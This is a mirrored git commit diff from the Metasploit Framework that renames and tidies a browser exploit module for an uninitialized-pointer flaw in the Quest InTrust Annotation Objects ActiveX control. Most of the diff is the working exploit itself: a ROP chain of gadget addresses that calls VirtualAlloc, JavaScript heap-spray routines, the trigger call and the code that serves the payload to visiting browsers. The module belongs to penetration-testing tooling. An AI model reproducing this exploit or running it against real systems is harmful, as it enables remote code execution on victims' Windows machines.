infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Module rename. Cleanup whitespace. Fix typos.

unstable
sinn3r 2012-04-12 01:30:01 -05:00
parent 14f85e406f
commit 0d739a1a51
1 changed files with 54 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

109
modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb → modules/exploits/windows/browser/intrust_annotatex_add.rb
View File

@ -1,12 +1,8 @@
##
# $Id$
##
### ###
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # http://metasploit.com/framework/
## ##
require 'msf/core' require 'msf/core'
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super( update_info(info, super( update_info(info,
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution', 'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
'Description' => %q{ 'Description' => %q{
This module exploits a uninitialized variable vulnerability in the This module exploits an uninitialized variable vulnerability in the
Annotation Objects ActiveX component. The activeX component loads into memory without Annotation Objects ActiveX component. The activeX component loads into memory without
opting into ALSR so this module exploits the vulnerability against windows Vista and opting into ALSR so this module exploits the vulnerability against windows Vista and
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
points to part of the rop chain in a heap chunk and the calculated call will hit the points to part of the ROP chain in a heap chunk and the calculated call will hit the
pivot in a seperate heap chunk. This will take some time in the users browser. pivot in a separate heap chunk. This will take some time in the users browser.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'rgod <rgod[at]autistici.org>', # initial discovery & poc 'rgod <rgod[at]autistici.org>', # initial discovery & poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf module 'mr_me <steventhomasseeley[at]gmail.com>' # msf module
], ],
'Version' => '$Revision$',
'References' => 'References' =>
[ [
[ 'OSVDB', '80662'], [ 'OSVDB', '80662'],
[ 'BID', '52765'], [ 'BID', '52765'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'], [ 'URL', 'http://www.exploit-db.com/exploits/18674/']
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'process', 'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f', 'InitialAutoRunScript' => 'migrate -f'
}, },
'Payload' => 'Payload' =>
{ {
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
# Re-generate the payload. # Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil) return if ((p = regenerate_payload(cli)) == nil)
@ -141,10 +134,11 @@ class Metasploit3 < Msf::Exploit::Remote
memory = new Array(); memory = new Array();
for (i=0;i<1000;i++){ memory[i] = block+shellcode; } for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
} }
function main(){ function main(){
heapspray(); heapspray();
#{obj_name}.Add(#{my_target.ret},1); #{obj_name}.Add(#{my_target.ret},1);
} }
EOS EOS
end end
@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote
junk, junk,
junk, junk,
junk, junk,
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot) 0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
].pack('V*') ].pack('V*')
rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's
rop_gadgets << [ rop_gadgets << [
0x44015CEF, # retn 0x44015CEF, # retn
0x44015CEF, # retn 0x44015CEF, # retn
0x44015CEF, # retn 0x44015CEF, # retn
0x44015cee, # pop edx ; retn 0x44015cee, # pop edx ; retn
0x4401a130, # ptr to &VirtualAlloc() (IAT) 0x4401a130, # ptr to &VirtualAlloc() (IAT)
0x44015ca4, # mov eax,[edx+4] ; retn 0x44015ca4, # mov eax,[edx+4] ; retn
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14 0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
junk, # filler (compensate) junk, # filler (compensate)
0x440159bb, # pop ebp ; retn 0x440159bb, # pop ebp ; retn
junk, # filler (retn offset compensation) junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation) junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation) junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation) junk, # filler (retn offset compensation)
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn) 0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
0x440012c1, # push esp ; ret 08 0x440012c1, # push esp ; ret 08
0x44016264, # pop ebx ; retn 0x44016264, # pop ebx ; retn
0x00004000, # 0x00000001-> ebx 0x00004000, # 0x00000001-> ebx
0x44015cc9, # pop edx ; retn 0x44015cc9, # pop edx ; retn
0x00001000, # 0x00001000-> edx 0x00001000, # 0x00001000-> edx
0x44017664, # pop ecx ; retn 0x44017664, # pop ecx ; retn
0x00000040, # 0x00000040-> ecx 0x00000040, # 0x00000040-> ecx
0x44017bd8, # pop edi ; retn 0x44017bd8, # pop edi ; retn
0x44017ebe, # retn 0x44017ebe, # retn
0x4400bf25, # pop eax ; retn 0x4400bf25, # pop eax ; retn
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn 0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c] 0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
0x90909090, # nops, do not change as it changes the offset 0x90909090, # nops, do not change as it changes the offset
0x90909090, 0x90909090,
0x90909090, 0x90909090,
0x90909090, 0x90909090,
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
var data = payload; var data = payload;
while(data.length < 100000) { data += data; } while(data.length < 100000) { data += data; }
var onemeg = data.substr(0, 64*1024/2); var onemeg = data.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += data.substr(0, 64*1024/2); for (i=0; i<14; i++) {
} onemeg += data.substr(0, 64*1024/2);
}
onemeg += data.substr(0, (64*1024/2)-(38/2)); onemeg += data.substr(0, (64*1024/2)-(38/2));
var block = new Array(); var block = new Array();
for (i=0; i<700; i++) {
block[i] = onemeg.substr(0, onemeg.length); for (i=0; i<700; i++) {
} block[i] = onemeg.substr(0, onemeg.length);
}
} }
function main(){ function main(){
heapspray(); heapspray();
#{obj_name}.Add(#{my_target.ret},1); #{obj_name}.Add(#{my_target.ret},1);
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
</html> </html>
EOF EOF
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
print_status("#{peer} Sending HTML...")
#Remove the extra tabs from content #Remove the extra tabs from content
content = content.gsub(/^\t\t/, '') content = content.gsub(/^\t\t/, '')